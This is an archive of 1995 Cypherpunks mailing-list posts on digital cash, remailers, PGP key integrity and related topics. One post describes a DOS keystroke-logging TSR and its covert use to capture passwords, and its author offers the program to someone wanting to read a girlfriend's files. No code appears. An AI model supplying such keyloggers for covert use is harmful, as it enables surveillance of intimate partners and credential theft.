though I recall either Norm Hardy or Hal Finney was one of those to
comment, it was noted that some clever uses of floating point hardware
can help with ostensibly integer-only computations. But PGP, as noted
above, does not do this, and I expect this trick is not common.)

> So, are there c-punk archives I could look in? I remember hearing something
> about that, too.
> 
> However, if someone remembers off the top of their head, or if they have an
> actual copy of the posting, that would be great, too.
> 
> Please send me whatever it is by e-mail. No point cluttering the list more
> than I already have...

(I will send Robert several of these article, so others don't have to.
Game theory and all that good stuff.)

> 
> Of all the nerve....

Not to sound strident, but if folks would keep copies of articles and
spend some time organizing them in data bases or in other searchable
forms, this would help the list. In my opinion, having personal access
to past posts is several orders of magnitude more important than
having MIDI-MIME JPEG-II TeX players that can display "Cypherpunks R
Us" in the correct font and with the "R" reversed according to spec.

--Tim May

-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
408-688-5409           | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204)
Date: Thu, 5 Jan 95 16:27:02 PST
To: cypherpunks@toad.com
Subject: Re: ecash trial issues explained
Message-ID: <9501060025.AA06458@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


> From: Wolfgang Roeckelein <wolfgang@wi.WHU-Koblenz.de>
> 
> >-> Digital cash should not be "anonymous" -- paper currency isn't.  Serial
> 
> There seems to be a misconception here what is meant with anonymous. Paper cash  
> is anonymous: I can't derive the person I got the note from from the note  
> itself. So if I meet a guy in the street, he gives me a pack of cigarettes and  
> I give him cash, this transaction is anonymous. 

It isn't difficult to make paper cash less anonymous, though, by tracking serial
numbers.  This is occasionally done in "law enforcement" situations - recording
the notes used to pay ransom or bribes.  It wouldn't be difficult to add 
serial-number recording equipment/mechanisms to automatic bank-teller machines, 
to record what serial numbers would be given out to whom.  
(This can be done either by adding scanners to the ATMs themselves, 
or by scanning the money before putting it into the ATM, and having the ATM record
that transaction #43 dispensed the 105th-110th bills in the stack.
Scanning can either be done by OCRs, or by replacing the human-readable
numbers with bar-codes, as some of the paranoids periodically suggest the
US Treasury is about to do as part of some heinous plan.

However, the original posters' assertion that digital cash should not be 
anonymous is not a technical statement, it's a value judgement, and in 
my opinion it's a bad one.  There are a lot of genuine social needs that
anonymity can support, and a lot of bad things that can be done with 
traceable money.  Aside from that, traceability costs money.  Original gold
and silver money didn't need to be traceable, though coiner's and assayer's marks
were useful, and it is easier to keep track of your pile of gold bars if they're
numbered.   But paper money has serial numbers largely to prevent easy copying;
gold is a lot harder to counterfeit, unless you've got a king who insists that
coins with his face on them should be worth N times as much as anonymous coins.

Bill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com (Russell Nelson)
Date: Thu, 5 Jan 95 16:27:39 PST
To: cypherpunks@toad.com
Subject: Re: Remailer postage
In-Reply-To: <199501052148.NAA07203@netcom5.netcom.com>
Message-ID: <m0rQ2ax-0008ZFC@crynwr.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


   From: tcmay@netcom.com (Timothy C. May)
   Date: Thu, 5 Jan 1995 13:48:34 -0800 (PST)

   (I understand that Russ Nelson has experience in the shareware
   business, so he may know how many people send in their voluntary
   contributions. My understanding is that it's a tiny fraction, and that
   few shareware authors ever make much money. I've talked to some of
   them, and they consider shareware a failed experiment, except for new
   products trying to break into crowded markets, where the "shareware"
   label is just a facade for essentially giving it away in exchange for
   fame and eventual fortune if the product goes commercial.)

Shareware is essentially begging, yes.  Far better to just give the
software away to create a need for your services.  Then people are
actually getting something for their money.

Selling services is profitable, particularly if you can sell the same
service to multiple people at the same time.  If you're very good at
selling, you can even sell a service as an insurance plan.

-- 
-russ <nelson@crynwr.com>    http://www.crynwr.com/crynwr/nelson.html
Crynwr Software   | Crynwr Software sells packet driver support | ask4 PGP key
11 Grant St.      | +1 315 268 1925 (9201 FAX)  | What is thee doing about it?
Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 5 Jan 95 16:32:59 PST
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: GIF_nip
Message-ID: <v01510102ab323c906927@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



>        Watch your Cc: headers, s'vous plait?

AAK! Eudora's "reply-to-all" strikes again!

Grovelling in your general direction,
Bob Hettinga

-----------------
Robert Hettinga  (rah@shipwright.com) "There is no difference between someone
Shipwright Development Corporation     who eats too little and sees Heaven and
44 Farquhar Street                       someone who drinks too much and sees
Boston, MA 02331 USA                       snakes." -- Bertrand Russell
(617) 323-7923






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Cooper <entropy@IntNet.net>
Date: Thu, 5 Jan 95 16:58:57 PST
To: Doug Barnes <db@Tadpole.COM>
Subject: Re: Remailer Abuse
In-Reply-To: <9501050453.AA10198@tadpole.tadpole.com>
Message-ID: <Pine.SV4.3.91.950105194814.15256A-100000@xcalibur>
MIME-Version: 1.0
Content-Type: text/plain


> Anonymous remailers pretty much require anonymous digital cash,
> although this could be built on top of some other electronic
> payment system with somewhat less payment lag and reversability 
> than FV.

   Perhaps if the people at DigiCash had seen fit to give me the beta 
client and server software I could attempt to implement such a beast.  
Unfortunately, I don't meet their critera.

-jon

( --------[ Jonathan D. Cooper ]--------[ entropy@intnet.net ]-------- )
( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4  5B 12 A0 35 E0 9B C0 01 )
( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 )




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Cooper <entropy@IntNet.net>
Date: Thu, 5 Jan 95 17:02:26 PST
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: your mail
In-Reply-To: <v01510100ab319028d7be@[199.0.65.105]>
Message-ID: <Pine.SV4.3.91.950105195203.15256B-100000@xcalibur>
MIME-Version: 1.0
Content-Type: text/plain


> >* Hackers have successfully compromised 350 DoD computer systems

   If the DoD includes the various branches of service {Army, Navy, etc.} 
that number is grossly inaccurate.

-jon

( --------[ Jonathan D. Cooper ]--------[ entropy@intnet.net ]-------- )
( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4  5B 12 A0 35 E0 9B C0 01 )
( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 )




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Handler <grendel@netaxs.com>
Date: Thu, 5 Jan 95 17:22:42 PST
To: cypherpunks@toad.com
Subject: Re: True Names
In-Reply-To: <9501060048.AA11061@netmail2.microsoft.com>
Message-ID: <Pine.SUN.3.91.950105202221.17607B-100000@unix1.netaxs.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May writes:

> I see copies in used bookstores often. It's in the collection "True
> Names and Something-or-other" and was in print until recenly.

	"True Names and Other Dangers", if anyone's trying to mail order it.

--Mike, still looking for a copy himself




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu>
Date: Thu, 5 Jan 95 17:40:39 PST
To: cypherpunks@toad.com
Subject: DES for HP48
Message-ID: <95Jan5.204113edt.4634@cannon.ecf.toronto.edu>
MIME-Version: 1.0
Content-Type: text/plain


There used to be some code on soda to do DES on an HP48 palmtop/calculator.
I looked this afternoon, on ftp.csua.berkeley.edu, and I couldn't find it.
Anyone know where it got to?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Thu, 5 Jan 95 20:43:54 PST
To: cypherpunks@toad.com
Subject: Re: DES for HP48
In-Reply-To: <95Jan5.204113edt.4634@cannon.ecf.toronto.edu>
Message-ID: <199501060443.UAA19367@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu>

   There used to be some code on soda to do DES on an HP48 palmtop/calculator.

ftp://ftp.csua.berkeley.edu/pub/cypherpunks/applications/misc/des.hp48sx.gz

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in (Rishab Aiyer Ghosh)
Date: Fri, 6 Jan 95 06:06:39 PST
To: cypher@dxm.ernet.in
Subject: Re: PATNEWS:  PTO accepting USENET FAQs are formal prior art
In-Reply-To: <199501040304.AA01233@world.std.com>
Message-ID: <B0ZLZc1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain



Thought I'd pass this on...
-Rishab

srctran@world.std.com (Gregory Aharonian) writes:

> !010394  PTO accepting USENET FAQs as formal prior art
> 
>      It seems that the US Patent Office is accepting Internet USENET FAQs
> (Frequently Asked Questions - periodic postings on USENET groups with
> questions and answers) as prior art.  As you see in the following entry
> from my software prior art database, one of the Other References is to
> a cryptography FAQ.  If any knows if the European Patent Office is accepting
> USENET FAQs, and has an example, let me know.
> 
>      Thus if an examiner objects to your use of a FAQ as prior art, cite
> this patent (NTIPAFCAP*).  It probably would be helpful if the PTO came out
> with a quick guideline to a consistent way of doing so.  I suppose archiving
> FAQs is one more thing I can add to my databases.
> 
>      It's nice to see the PTO embracing part of the Internet, even as it
> rejects other parts of the Internet.  Eventually, though, the PTO will have
> to choose one or the other.
> 
> Greg Aharonian
> Internet Patent News Service
> (for subscription info, send 'help' to   patents@world.std.com )
> (for prior art search services info, send 'prior' to patents@world.std.com )
> (for WWW patent searching, try  http://sunsite.unc.edu/patents/intropat.html 
>                               ====================
> 
> TYP[USPAT]
> NUM[5371794]
> ASS[Sun Microsystems]
> CUN[USX]
> ISD[19941206]
> CLS[380/21]
> ART[222]
> LOC[]
> GRG[]
> TIT[Method and apparatus for privacy and authentication in wireless networks]
> ORF[5]
> ORFTXT[
> Authentication and Authenticated Key Exchanges, Authors: Diffie, Oorschot &
>   Weiner, Published by Designs, Codes & Cryptography 2, 107-125,
>   .COPYRGT.1992 Kluwer Academic Publishers.
> The First Ten Years Of Public Key Cryptography, Author: Whitfield Diffie,
>   Reprinted from Proceedings of the IEEE, vol. 76, No. 5, May 1988.
> 
> Overview of Cryptology: Summary Of Internet Cryptology Frequently Asked
>   Questions (Oct. 1992).
> ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> 
> The Keys To Privacy and Authentication, Publication by RSA Data Security,
>   Inc., 100 Marine Parkway, Redwood City, Calif. 94065. (Oct. 1993).
> Answers To Frequently Asked Questions About Today's Cryptography, Author:
>   Paul Fahn, RSA Laboratories, 100 Marine Parkway, Redwood City, Calif. 94065
>   (Sep. 1992).
> ]
> 
> 
> =============================================================================
> 
> (NTIPAFCAP*  =  Not that issued patents are formally citable as precedent).


-----------------------------------------------------------------------------
Rishab Aiyer Ghosh                                "In between the breaths is
rishab@dxm.ernet.in                                  the space where we live"
rishab@arbornet.org                                        - Lawrence Durrell
Voice/Fax/Data +91 11 6853410  
Voicemail +91 11 3760335                 H 34C Saket, New Delhi 110017, INDIA  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 5 Jan 95 18:01:33 PST
To: cypherpunks@toad.com
Subject: floating point crypto?
Message-ID: <v01510100ab3251fa70de@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


I'm incensed.

I casually mentioned somewhere else that I saw something on this list about
floating-point math being used in crypto, contrary to popular belief, and
somebody had the *timerity* to call me on it. ;-).

I think it had to do with factoring, but maybe even in key-generation,
though that doesn't sound right at all...

So, are there c-punk archives I could look in? I remember hearing something
about that, too.

However, if someone remembers off the top of their head, or if they have an
actual copy of the posting, that would be great, too.

Please send me whatever it is by e-mail. No point cluttering the list more
than I already have...

Of all the nerve....

Cheers,
Bob Hettinga

-----------------
Robert Hettinga  (rah@shipwright.com) "There is no difference between someone
Shipwright Development Corporation     who eats too little and sees Heaven and
44 Farquhar Street                       someone who drinks too much and sees
Boston, MA 02331 USA                       snakes." -- Bertrand Russell
(617) 323-7923






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Thu, 5 Jan 95 12:56:32 PST
To: cypherpunks@toad.com
Subject: Re: Are 2048-bit pgp keys really secure ?
Message-ID: <9501052056.AA24402@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain


> A somewhat disturbing trend has appeared in the low-end cost-sensitive PC
> SIMM market.  Some supposedly 9-bit SIMMs are actually 8-bit SIMMs plus
> a parity generator.  This means that the parity checking is essentially
> subverted, because the parity bit is generated from the stored contents
> of memory at read time, rather than the stored contents when it was
> written to.  As such, NO bit errors are detected.

So why not do a cheap trick:

After the small primes check calculate a CRC checksum over the number.
Then do the primality check. If it is a prime, store it together with
the CRC. The CRC can be checked for every use of the number.

(PGP encrypts the secret key and therefore it generates a CRC for the
encrypted packet. But this CRC is generate after the primality check.)


We already had some SIMM modules with bit errors. They were detected by
a parity check. If cheap pc simms don't have a real parity bit, the probability
of having such a bug isn't as low as 10^-40. If cheap parity-less simms
are available they get sold (cheap and expensive). 


Hadmut

BTW: Some weeks ago they found motherbords with falsified cache rams:
They had just the normal DIL-ICs and the normal pins, but the plastic of
the ICs didn't contain a chip. The BIOS was modified to give out a message
about a good cache ram check at boot time.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock <carolann@vortex.mm.com>
Date: Thu, 5 Jan 1995 21:57:05 -0600
To: carolann@vortex.mm.com
Subject: No Subject
Message-ID: <82e47b32bd189967ee9a205e1d1602de@NO-ID-FOUND.mhonarc.org>
MIME-Version: 1.0
Content-Type: text/plain


[icicle.winternet.com] 
Login name: carolann  			In real life: CarolAnne Braddock
Directory: /usr2/carolann           	Shell: /etc/scripts/tcsh-susp
Last login Thu Jan  5 21:38 on ttyq5 from annex3-1.wintern
New mail received Thu Jan  5 21:16:23 1995;
  unread since Mon Jan  2 13:18:25 1995
Plan:
This account has been disabled permanently.

Mike Horwath - Admin - Winternet - drechsau@winternet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Harmon <harmon@tenet.edu>
Date: Thu, 5 Jan 95 22:54:18 PST
To: "Timothy C. May" <tcmay@netcom.com>
Subject: Re: Book review: Codebreakers, the Inside Story of Bletchley Park
In-Reply-To: <199501040551.VAA12193@netcom13.netcom.com>
Message-ID: <Pine.3.89.9501060058.B6821-0100000@Joyce-Perkins.tenet.edu>
MIME-Version: 1.0
Content-Type: text/plain


Another book that has not been mentioned is "Alan Turing the Enigma" by
Andrew Hodges.  It gives, what I think, is a good analysis of Turing's
work, alot of which is still classified, what role Hut 6 played (theater 
traffic analysis, bombe development, and other projects after Hut 6) , and 
his subquent role in the development computing.

Hodges does a good job of putting Turing in historical and 
mathematical/cryptological perspective.

Alas, like some of the books that are sugguested, it is recently out of 
print ( look for it in the remainder/used book stores).


Dan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m00012@KANGA.STCLOUD.MSUS.EDU
Date: Thu, 5 Jan 95 22:58:49 PST
To: cypherpunks@toad.com
Subject: sniff passwords on PC (DOS)
Message-ID: <0098A089.4C425900.550@KANGA.STCLOUD.MSUS.EDU>
MIME-Version: 1.0
Content-Type: text/plain


As a demonstration of concept, I wrote a small, simple program that
replaces the keyboard interrupt and stores all keystrokes in a buffer.

It was very very easy to write.

It works while using pgp and windows\net.

It does not work after starting windows.  Not sure, but it seems obvious
that MS windows installs it's own keyboard interrupt.

I suppose it would be easy to enhance this simple program (I bet it's been
done by others) to store passwords into a secret file on a hard drive
unbeknownest to the user.

I first suspected that such a program already existed after hearing, two
days after his arrest, that the CIA had cracked Aldrich Aim's encrypted
files.   (sorry if I spelled his name incorrectly.)

Think about it, the govt. could spend 50,000 to 100,000 to create a 
freeware gif viewer, for example, that installed such a tsr.

Mike

P.S.  If the guy who wanted to see his gf's files writes me, I'll send you
this keyboard sniffer program.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Harmon <harmon@tenet.edu>
Date: Thu, 5 Jan 95 23:11:22 PST
To: Doug Barnes <db@Tadpole.COM>
Subject: Re: Siegel and Lewis
In-Reply-To: <9501041424.AA25564@tadpole.tadpole.com>
Message-ID: <Pine.3.89.9501060003.C6821-0100000@Joyce-Perkins.tenet.edu>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 4 Jan 1995, Doug Barnes wrote:

> 
> Why is it that so many cypherpunks like the economist?
> 
> I learned recently that Eric is a big fan. So am I. You're certainly 
> not the first other cypherpunk to mention this. Weird. I mean, it's
> not exactly a radical publication... it just gets its *&#$*#$ facts
> right. Probably this is it.
> 
> Doug
> 

The reason is, and I do not presume to speak for other individuals on 
this list, the Economist looks at the world from an independent (i.e. not 
owned by one of the major publishing houses, if I'm not mistaken) point 
of view, and is not afraid to pursue different analysis of a topic.

I will also venture that the closest that we have in the US is Forbes.

Dan
  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock  <carolann@mm.com>
Date: Thu, 5 Jan 95 23:55:22 PST
To: cypherpunks@toad.com
Subject: All I did was properly crosspost!
Message-ID: <Pine.3.89.9501060124.B12234-0100000@downburst.mm.com>
MIME-Version: 1.0
Content-Type: text/plain



I first saw the Dubois Letter in alt.security.pgp the 28th.
PRZ posted it here the next day.

I "crossposted" it to my favorite 10 newsgroups. Just 10.
Some creep complained. (we'll get to him a bit later).

I didn't get a chance to get back on-line for 3 1/2 days.
I was lied to.

I am hurt. My mail has been stolen.
I haven't read any of you for four days now.

My web pages are vulnerable.
Is there somebody who can please help me get my 2 megs of mail?
I can't get at your keys.

http://www.winternet.com/~carolann/coffee.html has the cypherpunk
rant links on the page. I'm proud of them, and proud to be on this list.

But to take my account away for crossposting to 10 groups is not right.

I'll be back with a better chronology.

Love Always,

Carol Anne
ps Hope you like (and feel free to use) my new .sig





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock  <carolann@mm.com>
Date: Thu, 5 Jan 95 23:59:42 PST
To: Dan Harmon <harmon@tenet.edu>
Subject: Re: Siegel and Lewis
In-Reply-To: <Pine.3.89.9501060003.C6821-0100000@Joyce-Perkins.tenet.edu>
Message-ID: <Pine.3.89.9501060235.C12234-0100000@downburst.mm.com>
MIME-Version: 1.0
Content-Type: text/plain



Guess I'm worse than Siegel & Lewis now, huh?

On Fri, 6 Jan 1995, Dan Harmon wrote:
> On Wed, 4 Jan 1995, Doug Barnes wrote:
> > Why is it that so many cypherpunks like the economist?
> > I learned recently that Eric is a big fan. So am I. You're certainly 
> > not the first other cypherpunk to mention this. Weird. I mean, it's
> > not exactly a radical publication... it just gets its *&#$*#$ facts
> > right. Probably this is it.
> > Doug
> The reason is, and I do not presume to speak for other individuals on 
> this list, the Economist looks at the world from an independent (i.e. not 
> owned by one of the major publishing houses, if I'm not mistaken) point 
> of view, and is not afraid to pursue different analysis of a topic.
> 
> I will also venture that the closest that we have in the US is Forbes.
> 
> Dan
>   
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Fri, 6 Jan 95 00:02:03 PST
To: cypherpunks@toad.com
Subject: Re: public vs. private replies
Message-ID: <199501060807.DAA22166@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Tim May writes:
> [...] has asked that we reply in e-mail to him, to avoid
> "cluttering the list more than I already have...," but the logic of
> this is faulty. The few lines of a response such as this one, or even
> of several such responses, are as nothing compared to dozens or more
> people sifting their own archives so they can each independently send
> [...] what they find. Hence my public reply.

I'd like to amplify this point, which is missed all too often on Usenet and
mailing lists. Replies to requests for fairly widely-known factual information
should be directed to the forum (i.e. the mailing list, newsgroup, or what 
have you). This practice not only prevents duplication of effort by the 
repliers, as Tim mentioned, but also prevents duplication of effort by others 
interested in the same answer. I try to make a point of replying to the whole 
list when someone asks for a list of remailers, mail-news gateways, etc. for 
precisely this reason.

As I see it the basic principle rests on a simple comparison of the number of
replies desired with the likely number of replies. If you anticipate getting
many more replies than you want, you should ask for replies to the entire
forum in which you place the query. Otherwise, seek private email. This is
certainly not a perfect heuristic, but it's an excellent starting point IMHO.

For example, a few months back I wanted to give away an old AM/FM/
shortwave radio, so I posted to a local newsgroup. I asked for initial public 
replies, so that I wouldn't be flooded with mail before I had the chance to
announce that a recipient had been selected (first-come first-served). After
the initial expression of interest, further correspondence continued in 
private.

[...]
> In my opinion, having personal access
> to past posts is several orders of magnitude more important than
> having MIDI-MIME JPEG-II TeX players [...]

It takes more disk space from one's personal quota, though (for those who
suffer under such restrictions). :[

Let's not head down this road again....
"You've gotta keep `em separated !" -Offspring

 -L. Futplex McCarthy; PGP key by finger or server   "The objective is for us 
  to get those conversations whether they're by an alligator clip or ones and 
  zeroes. Wherever they are, whatever they are, I need them." -FBI Dir. Freeh

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBLwz5Mmf7YYibNzjpAQEooAQAlj93pc1CuSMTdApaRTg06ONgPkeyqUfY
KhdcqzDmEnuWBDdwgO+YtHOHFsOGlPhoFhOijajJzTh97G1TBYn5plBECaZXs1RJ
Au9g1uqEAKtFLFYB/jKDaDA/Xzf13irCKb846IAhttKICwQJ8HfLfgPWLHMa1/f1
ldkXYq7DfY8=
=7KNc
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLwz6PCoZzwIn1bdtAQGpbwGAqY6tLm7TAN2TluCpD1WOTsR6kMgI2R27
CMExwcLopwSapiPNO0u/IHnzHUq5ij2C
=TyKQ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock  <carolann@mm.com>
Date: Fri, 6 Jan 95 01:21:47 PST
To: Thaddeus Ozone <drozone@winternet.com>
Subject: We still don't have the mailbox.
In-Reply-To: <m0rQAWh-000SwqC@icicle.winternet.com>
Message-ID: <Pine.3.89.9501060352.D12376-0100000@downburst.mm.com>
MIME-Version: 1.0
Content-Type: text/plain



Thanks Doc. Wrote Phil Dubois, Zimmy's Lawyer. It's something I'll show you
a copy of when I get back to playing "catch-up".

Love Always,

Carol Anne

On Fri, 6 Jan 1995, Thaddeus Ozone wrote:

> Carol, 
> I DL'd the whole thang. If it was world-readable, I've got it locked up on
> my hard drive. I'll have to wait until I can get my hands on some 800k
> disks, it takes up 1776k on my hard drive, but should fit on 2 - 800k's
> once it gets transferred. I took the liberty of taking EVERYTHING that was
> readable, including what was in the main directory. Talk to you over the
> weekend.
>    Your pal,   -doc-
> 
> >I tried again, even from my pages.
> >I do believe it's the local server that's gotta do the job.
> >Anyway, I'm bookmarking all the links.
> >And downloading all the pages.
> >Will go ftp here in a minute.
> >
> >Love Always,
> >
> >Carol Anne
> >more in about an hour.
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Fri, 6 Jan 95 00:55:49 PST
To: cypherpunks@toad.com
Subject: Re: All I did was properly crosspost!
Message-ID: <199501060901.EAA22716@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

[I'm cc:ing this to C. A. Braddock's new address and her ex-sysadmin, in 
addition to the cypherpunks list. --L. Futplex McCarthy]

Carol Anne Braddock writes:
> I first saw the Dubois Letter in alt.security.pgp the 28th.
> PRZ posted it here the next day.
> 
> I "crossposted" it to my favorite 10 newsgroups. Just 10.

Posting letters asking for $$$ is of course a risky venture on Usenet. We
see the PRZ Appeal as a Worthy Cause (tm), but that's just what all the
MAKE.MONEY.FAST posters think of their garbage too. If you go sticking out
your hand, you'd better be doing it in the right place. My frank reaction as a
veteran Usenetter is that 10 newsgroups sounds like rather a lot, especially
when that presumably excludes the groups like a.s.pgp to which the letter was
originally posted. To which 10 newsgroups did you repost the letter ?

[...]
> Is there somebody who can please help me get my 2 megs of mail?

I believe it's questionable whether your old system is under any legal
obligation to provide access to your accumulated mail there. As I recall,
Netcom ended up deleting most of the deluge of mail Canter & Siegel received 
after their infamous spam. However, in this instance it does seem that it
would be polite (and good P.R.) to give you access to the mail your account 
has received.
Apologize and ask your former admin nicely, and you might well get it. He
could move it to an anon-ftp directory, perhaps encrypted with some public
key of yours :)

[...]
> But to take my account away for crossposting to 10 groups is not right.

Well, it depends greatly upon what you posted and where. If I posted the PRZ
Appeal to *my* ten favorite newsgroups (including alt.config, alt.religion.
kibology, and alt.sexual.abuse.recovery), I'd certainly expect to face trouble
and perhaps lose posting privileges. 

[...]
> Login name: carolann 			In real life: CarolAnne Braddock
> Directory: /usr2/carolann           	Shell: /etc/scripts/tcsh-susp
> Last login Thu Jan  5 21:38 on ttyq5 from annex3-1.wintern
> New mail received Thu Jan  5 21:16:23 1995;
>   unread since Mon Jan  2 13:18:25 1995
> Plan:
> This account has been disabled permanently.
> 
> Mike Horwath - Admin - Winternet - drechsau@winternet.com

 -L. Futplex McCarthy

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBLw0Fu2f7YYibNzjpAQGwoAP/RrXUl3vguSSJSvGDNKsXIMek61Ay5Cvy
xFO/NWcyZpzXkqwF3w19DOtke1EQ1NuPP7Z9luN6zF/QkqNwS6Z0mAMc8hcI0kLg
F3ESx06UABPJMQoVY63BtaDYuj6Dualjs903koAliIUhpITZ+qsf7jaj3qT1FtMa
d3SzHqOWGYM=
=876P
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLw0G3CoZzwIn1bdtAQHTCQGAgs4itNl5sAZMFjgMIx4Gef52o49+4q3k
m36gnACMfYDMThQyhcOS8udSMFw3YM4Q
=uty3
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Fri, 6 Jan 95 01:09:01 PST
To: cypherpunks@toad.com
Subject: Re: sniff passwords on PC (DOS)
Message-ID: <199501060914.EAA22804@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Mike writes:
> days after his arrest, that the CIA had cracked Aldrich Aim's encrypted
> files.   (sorry if I spelled his name incorrectly.)

FYI, I'm fairly sure it's "Aldrich Ames".

> Think about it, the govt. could spend 50,000 to 100,000 to create a 
> freeware gif viewer, for example, that installed such a tsr.

...most of that going to Compu$erve/Uni$y$...

> P.S.  If the guy who wanted to see his gf's files writes me, I'll send you
> this keyboard sniffer program.

Just to clarify slightly, the person who originally asked the question (Adam
Gerstein aka THE MAC GURU) said he had a _friend_ who wanted to see his (the
friend's) gf's files.

- - -L. Futplex McCarthy



- -----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBLw0I8mf7YYibNzjpAQEF/wP9GPKLX7KifBFRenzmbvsCdbOQ7Narlm8/
qiW/nSLRr7jZUtjAyhYM71eI9GsQbO6lADfV9ncoPIATNB/eJNCqa2O0cmNa67O/
KuUSQl0NQPiUQyevkLRldllEb9hSuTNeHyJZ4SFDpMbFrGYXX4Iu/w9RYcn9ssNS
29qFs0vNK30=
=Z0ZM
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLw0J9ioZzwIn1bdtAQHXVgF8CVyuTHInzoYDUZmZZXwksIosAuiP4TSh
pfZJLbRcoPPP9sJ63CTfnexZXenEzhLf
=zrNo
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Fri, 6 Jan 95 02:05:21 PST
To: cypherpunks@toad.com
Subject: Chain letter bounced (fwd)
Message-ID: <199501061011.FAA23248@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

A small advisory: since na166182@anon.penet.fi is subscribed to the c'punks
list, and anon.penet.fi attempts to filter out instances of Make Money Fast,
any mention of "MAKE.MONEY.FAST" on the list will likely generate an autoreply
like the one below. It appears that a copy of the MAKE.MONEY.FAST FAQ (there,
I've said it again :) included in the autoreply will even trigger this 
mechanism, which is awfully ironic at best. At worst, this self-referential
property seems liable to allow some nasty email feedback loops. Offhand it
